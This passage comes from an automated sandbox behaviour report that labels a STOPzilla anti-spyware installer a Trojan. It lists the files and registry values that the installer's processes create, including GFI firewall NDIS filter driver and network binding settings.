%Program Files% (x86)\STOPzilla\Definitions\LKGD\ThreatID.vdx (82810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\FastSigs.vdx (280 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\HistoryCleaner.xml (5951 bytes)
C:\ProgramData\STOPzilla!\Logs\SBAMSvcLog.csv (1383028 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ctid.vtd (341308 bytes)
%Program Files% (x86)\STOPzilla\Definitions\cname.wtd (601 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\elf_hash.dat (528 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\qscnr.vdx (80 bytes)

The process %original file name%.exe:1912 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TarF5E3.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A4B782275DC1682E4DC39E697A49B151 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 (656 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CabF5E2.tmp (48 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\STOPzilla7.msi (1643823 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A4B782275DC1682E4DC39E697A49B151 (412 bytes)

The process runonce.exe:3092 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl (712 bytes)

The process runonce.exe:2736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl (712 bytes)

The process GFI.Tools.Run64.exe:1928 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\STOPzilla\SBSetupDrivers.exe (180 bytes)

The process DrvInst.exe:2212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\DriverStore\infpub.dat (252 bytes)
C:\Windows\System32\DriverStore\Temp\{4f69f560-3dc5-07a7-53cf-bd6e4eaaf72f}\SETDC0D.tmp (3 bytes)
C:\Windows\System32\DriverStore\Temp\{4f69f560-3dc5-07a7-53cf-bd6e4eaaf72f}\SETDBFC.tmp (8 bytes)
C:\Windows\System32\DriverStore\infstrng.dat (1764 bytes)
C:\Windows\System32\DriverStore\INFCACHE.0 (1861 bytes)
C:\Windows\System32\DriverStore\infstor.dat (940 bytes)
C:\Windows\inf\oem13.inf (3 bytes)
C:\Windows\System32\DriverStore\Temp\{4f69f560-3dc5-07a7-53cf-bd6e4eaaf72f}\amd64\wnet\SETDC0E.tmp (601 bytes)
C:\Windows\System32\DriverStore\FileRepository\sbfwim.inf_amd64_neutral_09abe461a7fb864d\sbfwim.PNF (8464 bytes)

The process DrvInst.exe:1680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\DriverStore\infpub.dat (252 bytes)
C:\Windows\System32\DriverStore\Temp\{43a08643-c069-7a03-1bae-01365fc66a22}\SETDDE0.tmp (8 bytes)
C:\Windows\inf\oem14.inf (1 bytes)
C:\Windows\System32\DriverStore\infstrng.dat (1628 bytes)
C:\Windows\System32\DriverStore\INFCACHE.0 (1325 bytes)
C:\Windows\System32\DriverStore\infstor.dat (748 bytes)
C:\Windows\System32\DriverStore\Temp\{43a08643-c069-7a03-1bae-01365fc66a22}\SETDDF0.tmp (1 bytes)
C:\Windows\System32\DriverStore\FileRepository\sbfwim_m.inf_amd64_neutral_9058dec7bb12b258\sbfwim_m.PNF (4811 bytes)

The process STOPzilla.exe:3836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ProgramData\STOPzilla!\Logs\S-1-5-21-2858020935-2156992550-3658131804-1003.stopzilla7.log (24142 bytes)
C:\ProgramData\STOPzilla!\sz7.data-journal (4518 bytes)
C:\ProgramData\STOPzilla!\sz7.data (1853 bytes)

The process RUNDLL32.exe:3528 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Temp\OLD168C.tmp (601 bytes)
C:\Windows\System32\drivers\SET169B.tmp (691 bytes)

The process regsvr32.exe:3500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\STOPzilla\x64\SBAMSvcPS.dll (69 bytes)

The process regsvr32.exe:1496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\STOPzilla\x64\SBAMOutlook.dll (446 bytes)

The process SZNetAssistant.exe:3916 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Temp\cfc791fe-c515-4b74-a3d5-bd35083fed43 (223 bytes)
C:\Windows\Temp\b547cdad-d8a5-4d61-95a2-f7616170c67e (223 bytes)
C:\Windows\Temp\ae0b2b8c-b2b5-4e50-b7ff-769522044179 (223 bytes)
C:\ProgramData\STOPzilla!\Logs\sz-net-assist.log (19768668 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A4B782275DC1682E4DC39E697A49B151 (1 bytes)
C:\Windows\Temp\fff275e4-419b-48fe-963a-c0011a05bfb9 (48733 bytes)
C:\Windows\Temp\037d4f6a-0574-4316-b003-d803b0bc2577 (24945 bytes)
C:\Windows\Temp\4c7c3001-c7cf-4f43-88e1-0f52a08e06a9 (223 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A4B782275DC1682E4DC39E697A49B151 (412 bytes)
C:\Windows\Temp\59db4a19-a509-4b93-b854-13678662fd8f (10071 bytes)
C:\Windows\Temp\bbe27e88-1190-4118-a730-4f9519d6c74d (30169149 bytes)
C:\Windows\Temp\7f53ae67-47b8-4bf2-aad3-054d5e7e2bf1 (223 bytes)
C:\Windows\Temp\73901abc-e30f-42ed-898e-68cb9217849e (223 bytes)

The process SZServer.exe:3384 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ProgramData\STOPzilla!\sz7.data-journal (86080 bytes)
C:\ProgramData\STOPzilla!\sz7.data (35985 bytes)
C:\ProgramData\STOPzilla!\Logs\sz7.log (78551 bytes)

The process SZServer.exe:992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ProgramData\STOPzilla!\sz7.data-journal (129706 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_o4arGwZ2LOh436Q (80 bytes)
C:\Windows\SysWOW64\msvcr120.dll (974 bytes)
C:\ProgramData\STOPzilla!\Logs\sz7-msi.log (18618 bytes)
C:\ProgramData\STOPzilla!\sz7.data (22161 bytes)
%Program Files% (x86)\STOPzilla\GFI.Tools.Run64.exe (192 bytes)
C:\Windows\SysWOW64\msvcp120.dll (458 bytes)

The process SZWSC.exe:3788 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ProgramData\STOPzilla!\Logs\wsc.log (6794 bytes)

The process SZWSC.exe:2612 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ProgramData\STOPzilla!\Logs\wsc.log (11204 bytes)

The process MsiExec.exe:2456 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI16DA.tmp (159 bytes)

Registry activity

The process SBSetupDrivers.exe:3152 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\SbFw]
"Start" = "1"
"ErrorControl" = "1"
"Type" = "1"
"ImagePath" = "system32\drivers\SbFw.sys"
"AlwaysSecure" = "0"
"Tag" = "12"
"DisplayName" = "SbFw"
"AdapterNotificationDisabled" = "0"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0B 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\services\SbFw]
"DependOnService" = "tdx,"
"Group" = "PNP_TDI"
"StatInspEnabled" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\services\SbFw]

The process SBSetupDrivers.exe:1812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0005\Linkage]
"UpperBind" = "Wanarpv6"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012\Linkage]
"RootDevice" = "{E73BBB69-B487-482C-A52B-439651CE880D}, {4AB0D2BA-E805-472C-9283-2A108EC5CAE2}"

[HKLM\System\CurrentControlSet\services\SBFWIMCLMP]
"BlockIPv6" = "0"

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi\Interfaces]
"FilterMediaTypes" = "ethernet, wan"

[HKLM\System\CurrentControlSet\Enum\Root\SB_SBFWIMCLMP\0000\Device Parameters]
"InstanceIndex" = "1"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"FilterClass" = "failover"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0008\Linkage]
"RootDevice" = "NdisWanIp"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"NetLuidIndex" = "3"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"*IfType" = "1"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012\Linkage]
"UpperBind" = "Ndisuio, RasPppoe, rspndr, lltdio, Tcpip"

[HKLM\SYSTEM\Setup\SetupapiLogStatus]
"setupapi.app.log" = "4096"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"NetLuidIndex" = "2"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"NewDeviceInstall" = "1"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0008\Linkage]
"UpperBind" = "Wanarp"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014\Ndi]
"Service" = "SBFWIMCLMP"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"Characteristics" = "41"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"DeviceInstanceID" = "ROOT\SB_SBFWIMCLMP\0001"
"NewDeviceInstall" = "1"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0006\Linkage]
"RootDevice" = "NdisWanBh"

[HKLM\System\CurrentControlSet\Control\Nsi\{eb004a11-9b1a-11d4-9123-0050047759bc}\10]
"0000000100000100" = "AE 01 84 04 32 00 4C 00 6F 00 63 00 61 00 6C 00"

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}]
"Description" = "GFI Software Firewall NDIS IM Filter"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"sstpsvc.dll,-203" = "Allows you to securely connect to a private network using the Internet."

[HKLM\System\CurrentControlSet\services\SBFWIMCL\Parameters\Adapters\NdisWanIpv6]
"UpperBindings" = "\Device\{A6D1A1FB-3CC9-4C17-A9BC-B98F22A69FD4}"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"*IfType" = "1"

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi\Interfaces]
"LowerRange" = "nolower"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016\Linkage]
"UpperBind" = ""

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"FilterClass" = "failover"

[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{E73BBB69-B487-482C-A52B-439651CE880D}\Connection]
"Name" = "Local Area Connection* 9"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"DeviceInstanceID" = "ROOT\SB_SBFWIMCLMP\0003"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"FilterInfId" = "sb_sbfwimcl"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\System32\drivers]
"pacer.sys,-100" = "Quality of Service Packet Scheduler. This component provides network traffic control, including rate-of-flow and prioritization services."

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi]
"FilterDeviceInfFile" = "sbfwim_m.inf"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0007\Linkage]
"Export" = "\Device\{4AB0D2BA-E805-472C-9283-2A108EC5CAE2}"

[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{AFB7E826-C56D-4AAB-B128-DC1EACFEE45E}\Connection]
"Name" = "Local Area Connection* 12"

[HKLM\System\CurrentControlSet\Enum\Root\SB_SBFWIMCLMP\0002\Device Parameters]
"InstanceIndex" = "3"

[HKLM\System\CurrentControlSet\services\eventlog\System\Anti-Spyware Filter]
"EventMessageFile" = "%SystemRoot%\System32\drivers\sbapifs.sys"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"DeviceInstanceID" = "ROOT\SB_SBFWIMCLMP\0002"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"FilterInfId" = "sb_sbfwimcl"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"FilterInfId" = "sb_sbfwimcl"

[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{A6D1A1FB-3CC9-4C17-A9BC-B98F22A69FD4}\Connection]
"Name" = "Local Area Connection* 14"

[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{0AAEF71A-F2DB-488E-86C0-8BA7E633F590}\Connection]
"DefaultNameIndex" = "13"

[HKLM\System\CurrentControlSet\Control\Nsi\{eb004a11-9b1a-11d4-9123-0050047759bc}\10]
"0000000300000100" = "AE 01 84 04 32 00 4C 00 6F 00 63 00 61 00 6C 00"

[HKLM\System\CurrentControlSet\Enum\Root\SB_SBFWIMCLMP\0001\Device Parameters]
"InstanceIndex" = "2"

[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{A6D1A1FB-3CC9-4C17-A9BC-B98F22A69FD4}\Connection]
"DefaultNameIndex" = "14"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0007\Linkage]
"RootDevice" = "{4AB0D2BA-E805-472C-9283-2A108EC5CAE2}"

[HKLM\System\CurrentControlSet\services\SbFw]
"StatInspEnabled" = "1"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"ComponentID" = "sb_sbfwimclmp"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"Characteristics" = "41"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"rascfg.dll,-32008" = "Allows you to securely connect to a private network using the Internet."
"rascfg.dll,-32009" = "Allows you to securely connect to a private network using the Internet."

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016\Linkage]
"RootDevice" = "{0AAEF71A-F2DB-488E-86C0-8BA7E633F590}, NdisWanBh"

[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{0AAEF71A-F2DB-488E-86C0-8BA7E633F590}\Connection]
"Name" = "Local Area Connection* 13"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"ComponentID" = "sb_sbfwimclmp"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"@netcfgx.dll,-50003" = "Allows other computers to access resources on your computer using a Microsoft network."
"@netcfgx.dll,-50002" = "Allows your computer to access resources on a Microsoft network."

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"FilterClass" = "failover"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0007\Linkage]
"UpperBind" = "Ndisuio, RasPppoe, rspndr, lltdio, Tcpip"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012\Ndi]
"Service" = "SBFWIMCLMP"

[HKLM\System\CurrentControlSet\Control\Nsi\{eb004a11-9b1a-11d4-9123-0050047759bc}\10]
"0000000000000100" = "AE 01 84 04 30 00 4C 00 6F 00 63 00 61 00 6C 00"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014\Linkage]
"FilterList" = "{AFB7E826-C56D-4AAB-B128-DC1EACFEE45E}-{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000"

[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{E73BBB69-B487-482C-A52B-439651CE880D}\Connection]
"DefaultNameIndex" = "9"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"Characteristics" = "41"

[HKLM\System\CurrentControlSet\services\SbFw]
"AdapterNotificationDisabled" = "0"

[HKLM\System\CurrentControlSet\services\NDIS\IfTypes\1]
"IfUsedNetLuidIndices" = "01"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"Characteristics" = "41"

[HKLM\System\CurrentControlSet\services\sbapifs\Instances\ActiveProtection]
"Altitude" = "268000"

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi]
"Service" = "SBFWIMCL"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"@tcpipcfg.dll,-50002" = "TCP/IP version 6. The latest version of the internet protocol that provides communication across diverse interconnected networks."

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi]
"HelpText" = "GFI Software Firewall NDIS IM Filter"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016\Linkage]
"Export" = "\Device\{0AAEF71A-F2DB-488E-86C0-8BA7E633F590}"

[HKLM\System\CurrentControlSet\Services\NdisWan\Linkage]
"Export" = "\Device\NdisWan_{D720734D-0C14-4C25-829D-F6B4814978B3}, \Device\NdisWan_{50CD5E3E-0F08-4519-A9EF-B9802ED12701}, \Device\NdisWan_{5D403E7A-7554-4DD5-A8CF-7099B00A9E2D}, \Device\NdisWan_{B22E8C55-CC74-4FBE-B907-F46D25953BEC}, \Device\NdisWan_{CACEFAA3-95D9-4B5B-B275-FF35DF23713E}, \Device\NdisWan_{CFCD29B3-A836-426F-8329-8362EC941293}"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012\Linkage]
"Export" = "\Device\{E73BBB69-B487-482C-A52B-439651CE880D}"

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}]
"LocDescription" = "@oem13.inf,%sbfwimcl_desc%;GFI Software Firewall NDIS IM Filter"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016\Ndi]
"Service" = "SBFWIMCLMP"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0B 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017\Linkage]
"Export" = "\Device\{A6D1A1FB-3CC9-4C17-A9BC-B98F22A69FD4}"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014\Linkage]
"UpperBind" = "Wanarp"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0005\Linkage]
"Export" = "\Device\NdisWanIpv6"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"NetCfgInstanceId" = "{A6D1A1FB-3CC9-4C17-A9BC-B98F22A69FD4}"

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi\Interfaces]
"LowerExclude" = "ndisatm, ndiscowan, ndiswan, ndiswanasync, ndiswanipx, ndiswannbf"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0007]
"NetCfgInstanceId" = "{4AB0D2BA-E805-472C-9283-2A108EC5CAE2}"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"NetLuidIndex" = "1"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012\Linkage]
"FilterList" = "{E73BBB69-B487-482C-A52B-439651CE880D}-{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000, {E73BBB69-B487-482C-A52B-439651CE880D}-{B70D6460-3635-4D42-B866-B8AB1A24454C}-0000"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"NewDeviceInstall" = "1"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017\Linkage]
"FilterList" = "{A6D1A1FB-3CC9-4C17-A9BC-B98F22A69FD4}-{B5F4D659-7DAA-4565-8E41-BE220ED60542}-0000"

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Parameters]
"Param1" = "4"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0006\Linkage]
"Export" = "\Device\NdisWanBh"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"InstallTimestamp" = "DF 07 04 00 06 00 19 00 01 00 10 00 39 00 92 02"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"FilterClass" = "failover"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"InstallTimestamp" = "DF 07 04 00 06 00 19 00 01 00 10 00 39 00 1B 01"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0016]
"InstallTimestamp" = "DF 07 04 00 06 00 19 00 01 00 10 00 39 00 E6 01"

[HKLM\System\CurrentControlSet\Control\Network]
"Config" = "00 00 00 00 00 00 00 00 2B 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}\Ndi]
"FilterClass" = "failover"

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}]
"InstallTimestamp" = "DF 07 04 00 06 00 19 00 01 00 10 00 38 00 3F 03"
"Characteristics" = "17424"

[HKLM\System\CurrentControlSet\services\SBFWIMCLMP]
"AdapterNotificationDisabled" = "0"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"ComponentID" = "sb_sbfwimclmp"

[HKLM\System\CurrentControlSet\Services\NdisWan\Linkage]
"Bind" = "\Device\{D720734D-0C14-4C25-829D-F6B4814978B3}, \Device\{50CD5E3E-0F08-4519-A9EF-B9802ED12701}, \Device\{5D403E7A-7554-4DD5-A8CF-7099B00A9E2D}, \Device\{B22E8C55-CC74-4FBE-B907-F46D25953BEC}, \Device\{CACEFAA3-95D9-4B5B-B275-FF35DF23713E}, \Device\{CFCD29B3-A836-426F-8329-8362EC941293}"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0006\Linkage]
"UpperBind" = ""

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017\Linkage]
"UpperBind" = "Wanarpv6"

[HKLM\System\CurrentControlSet\services\SbFw]
"AlwaysSecure" = "0"

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}]
"InfPath" = "C:\Windows\INF\oem13.inf"

[HKLM\System\CurrentControlSet\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0017\Ndi]
"Service" = "SBFWIMCLMP"

[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{AFB7E826-C56D-4AAB-B128-DC1EACFEE45E}\Connection]
"DefaultNameResourceId" = "1801"

[HKLM\System\CurrentControlSet\services\eventlog\System\Anti-Spyware Filter]
"TypesSupported" = "7"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0008\Linkage]
"Export" = "\Device\NdisWanIp"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"InstallTimestamp" = "DF 07 04 00 06 00 19 00 01 00 10 00 39 00 60 00"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0006]
"NetCfgInstanceId" = "{B1422D78-82BA-4FD0-B38A-6203899A1A72}"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32]
"rascfg.dll,-32010" = "Provides the abilitiy to connect a host to a Remote Access Concentrator that supports RFC2516."

[HKLM\System\CurrentControlSet\Control\Network\{4d36e974-e325-11ce-bfc1-08002be10318}\{96E03330-1F76-4A96-B984-03D38593DA1B}]
"InfSection" = "SBFWIMCL.ndi"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"NetCfgInstanceId" = "{E73BBB69-B487-482C-A52B-439651CE880D}"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{AFB7E826-C56D-4AAB-B128-DC1EACFEE45E}\Connection]
"DefaultNameIndex" = "12"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0005\Linkage]
"RootDevice" = "NdisWanIpv6"

[HKLM\System\CurrentControlSet\services\sbapifs]
"SupportedFeatures" = "3"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0005]
"NetCfgInstanceId" = "{0D252192-084F-4C37-8DED-14986BA82F63}"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0014]
"NetCfgInstanceId" = "{AFB7E826-C56D-4AAB-B128-DC1EACFEE45E}"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0017]
"NewDeviceInstall" = "1"

[HKLM\System\CurrentControlSet\services\SBFWIMCL\Parameters\Adapters\{4AB0D2BA-E805-472C-9283-2A108EC5CAE2}]
"UpperBindings" = "\Device\{E73BBB69-B487-482C-A52B-439651CE880D}"

[HKLM\System\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0012]
"NetLuidIndex" = "0"

[HKLM\System\CurrentControlSet\services\SBFWIMCL\Parameters\Adapters\NdisWanIp]
"UpperBindings" = "\Device\{AFB7E826-C56D-4AAB-B128-DC1EACFEE45E}"

[HKLM\System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\{E73BBB69-B487-482C-A52B-439651CE880D}\Connection]
"DefaultNameResourceId" = "1801"

[HKLM\System\CurrentControlSet\Services\NdisWan\Linkage]
